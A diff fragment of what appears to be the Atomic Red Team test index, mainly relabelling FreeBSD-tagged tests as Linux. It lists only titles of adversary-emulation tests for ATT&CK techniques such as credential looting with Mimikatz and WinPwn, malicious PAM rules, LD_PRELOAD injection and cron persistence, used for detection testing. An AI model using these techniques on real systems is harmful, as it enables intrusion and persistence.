- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -724,7 +724,7 @@
|
||||
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
|
||||
- Atomic Test #1: Space After Filename (Manual) [macos]
|
||||
- Atomic Test #2: Space After Filename [macos, linux]
|
||||
- Atomic Test #3: Space After Filename (FreeBSD) [freebsd]
|
||||
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
|
||||
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
|
||||
- Atomic Test #1: Mimikatz Pass the Hash [windows]
|
||||
- Atomic Test #2: crackmapexec Pass the Hash [windows]
|
||||
@@ -743,7 +743,7 @@
|
||||
- Atomic Test #3: WMIC bypass using local XSL file [windows]
|
||||
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
|
||||
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
|
||||
- Atomic Test #2: Mac Hidden file [macos]
|
||||
- Atomic Test #3: Create Windows System File with Attrib [windows]
|
||||
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
|
||||
@@ -787,11 +787,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
|
||||
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
|
||||
@@ -855,11 +855,11 @@
|
||||
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
|
||||
- Atomic Test #1: Service Registry Permissions Weakness [windows]
|
||||
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
|
||||
@@ -881,9 +881,9 @@
|
||||
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
|
||||
- Atomic Test #5: Remote Service Installation CMD [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
|
||||
@@ -938,9 +938,9 @@
|
||||
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [linux]
|
||||
- Atomic Test #3: Trap SIGINT [macos, linux]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
|
||||
@@ -954,15 +954,15 @@
|
||||
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
|
||||
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
|
||||
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
|
||||
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
|
||||
- Atomic Test #7: Make and modify capabilities of a binary [linux]
|
||||
- Atomic Test #8: Provide the SetUID capability to a file [linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
|
||||
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
|
||||
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
|
||||
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
|
||||
@@ -1059,9 +1059,9 @@
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- Atomic Test #3: Add command to .shrc [freebsd]
|
||||
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
|
||||
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
|
||||
- Atomic Test #3: Add command to .shrc [linux]
|
||||
- Atomic Test #4: Append to the system shell profile [linux]
|
||||
- Atomic Test #5: Append commands user shell profile [linux]
|
||||
- Atomic Test #6: System shell profile scripts [linux]
|
||||
- Atomic Test #7: Create/Append to .bash_logout [linux]
|
||||
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
|
||||
@@ -1098,11 +1098,11 @@
|
||||
- Atomic Test #1: rc.common [macos]
|
||||
- Atomic Test #2: rc.common [linux]
|
||||
- Atomic Test #3: rc.local [linux]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [linux]
|
||||
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
|
||||
- Atomic Test #1: Create Systemd Service [linux]
|
||||
- Atomic Test #2: Create SysV Service [freebsd]
|
||||
- Atomic Test #2: Create SysV Service [linux]
|
||||
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
|
||||
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1128,7 +1128,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
|
||||
- Atomic Test #1: Process Injection via mavinject.exe [windows]
|
||||
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
|
||||
@@ -1144,11 +1144,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
|
||||
- Atomic Test #1: User scope COR_PROFILER [windows]
|
||||
- Atomic Test #2: System Scope COR_PROFILER [windows]
|
||||
@@ -1201,9 +1201,9 @@
|
||||
- Atomic Test #10: LNK Payload Download [windows]
|
||||
- Atomic Test #11: Mirror Blast Emulation [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1271,22 +1271,22 @@
|
||||
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [linux, macos]
|
||||
- Atomic Test #3: Harvest SUID executable files [linux]
|
||||
- Atomic Test #4: LinEnum tool execution [linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
|
||||
- Atomic Test #6: What shell is running [freebsd, linux]
|
||||
- Atomic Test #7: What shells are available [freebsd, linux]
|
||||
- Atomic Test #8: Command line scripts [freebsd, linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [linux]
|
||||
- Atomic Test #6: What shell is running [linux]
|
||||
- Atomic Test #7: What shells are available [linux]
|
||||
- Atomic Test #8: Command line scripts [linux]
|
||||
- Atomic Test #9: Obfuscated command line scripts [linux]
|
||||
- Atomic Test #10: Obfuscated command line scripts (freebsd) [freebsd]
|
||||
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
|
||||
- Atomic Test #11: Change login shell [linux]
|
||||
- Atomic Test #12: Change login shell (freebsd) [freebsd]
|
||||
- Atomic Test #12: Change login shell (freebsd) [linux]
|
||||
- Atomic Test #13: Environment variable scripts [linux]
|
||||
- Atomic Test #14: Environment variable scripts (freebsd) [freebsd]
|
||||
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
|
||||
- Atomic Test #15: Detecting pipe-to-shell [linux]
|
||||
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [freebsd]
|
||||
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
|
||||
- Atomic Test #17: Current kernel information enumeration [linux]
|
||||
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
|
||||
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
|
||||
@@ -1301,10 +1301,10 @@
|
||||
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
|
||||
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
|
||||
- Atomic Test #2: Execute Python via scripts [linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
|
||||
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
|
||||
- Atomic Test #1: Create and Execute Batch Script [windows]
|
||||
@@ -1333,7 +1333,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1357,7 +1357,7 @@
|
||||
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1394,9 +1394,9 @@
|
||||
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
|
||||
- Atomic Test #5: Remote Service Installation CMD [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1137 Office Application Startup](../../T1137/T1137.md)
|
||||
@@ -1425,9 +1425,9 @@
|
||||
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
|
||||
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
|
||||
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1473,21 +1473,21 @@
|
||||
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [linux]
|
||||
- Atomic Test #3: Trap SIGINT [macos, linux]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
|
||||
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
|
||||
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
|
||||
- Atomic Test #1: Create a user account on a Linux system [linux]
|
||||
- Atomic Test #2: Create a user account on a FreeBSD system [freebsd]
|
||||
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
|
||||
- Atomic Test #3: Create a user account on a MacOS system [macos]
|
||||
- Atomic Test #4: Create a new user in a command prompt [windows]
|
||||
- Atomic Test #5: Create a new user in PowerShell [windows]
|
||||
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [freebsd]
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
|
||||
- Atomic Test #8: Create a new Windows admin user [windows]
|
||||
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1503,7 +1503,7 @@
|
||||
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
|
||||
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
|
||||
@@ -1623,9 +1623,9 @@
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- Atomic Test #3: Add command to .shrc [freebsd]
|
||||
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
|
||||
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
|
||||
- Atomic Test #3: Add command to .shrc [linux]
|
||||
- Atomic Test #4: Append to the system shell profile [linux]
|
||||
- Atomic Test #5: Append commands user shell profile [linux]
|
||||
- Atomic Test #6: System shell profile scripts [linux]
|
||||
- Atomic Test #7: Create/Append to .bash_logout [linux]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
@@ -1670,12 +1670,12 @@
|
||||
- Atomic Test #1: rc.common [macos]
|
||||
- Atomic Test #2: rc.common [linux]
|
||||
- Atomic Test #3: rc.local [linux]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [linux]
|
||||
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
|
||||
- Atomic Test #1: Create Systemd Service [linux]
|
||||
- Atomic Test #2: Create SysV Service [freebsd]
|
||||
- Atomic Test #2: Create SysV Service [linux]
|
||||
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
|
||||
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1703,7 +1703,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
|
||||
- Atomic Test #1: Netsh Helper DLL Registration [windows]
|
||||
@@ -1719,11 +1719,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
|
||||
- Atomic Test #1: User scope COR_PROFILER [windows]
|
||||
- Atomic Test #2: System Scope COR_PROFILER [windows]
|
||||
@@ -1733,7 +1733,7 @@
|
||||
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
|
||||
- Atomic Test #1: Base64 Encoded data. [macos, linux]
|
||||
- Atomic Test #2: Base64 Encoded data (freebsd) [freebsd]
|
||||
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
|
||||
- Atomic Test #3: XOR Encoded data. [windows]
|
||||
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
|
||||
@@ -1785,11 +1785,11 @@
|
||||
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
|
||||
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
|
||||
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
|
||||
- Atomic Test #5: Tor Proxy Usage - FreeBSD [freebsd]
|
||||
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
|
||||
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1571 Non-Standard Port](../../T1571/T1571.md)
|
||||
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- [T1573 Encrypted Channel](../../T1573/T1573.md)
|
||||
- Atomic Test #1: OpenSSL C2 [windows]
|
||||
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1806,14 +1806,14 @@
|
||||
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
|
||||
- Atomic Test #1: Malicious User Agents - Powershell [windows]
|
||||
- Atomic Test #2: Malicious User Agents - CMD [windows]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #7: certutil download (urlcache) [windows]
|
||||
- Atomic Test #8: certutil download (verifyctl) [windows]
|
||||
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
|
||||
@@ -1821,7 +1821,7 @@
|
||||
- Atomic Test #11: OSTAP Worming Activity [windows]
|
||||
- Atomic Test #12: svchost writing a file to a UNC path [windows]
|
||||
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
|
||||
- Atomic Test #14: whois file download [freebsd, linux, macos]
|
||||
- Atomic Test #14: whois file download [linux, macos]
|
||||
- Atomic Test #15: File Download via PowerShell [windows]
|
||||
- Atomic Test #16: File download with finger.exe on Windows [windows]
|
||||
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
|
||||
@@ -1840,7 +1840,7 @@
|
||||
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
|
||||
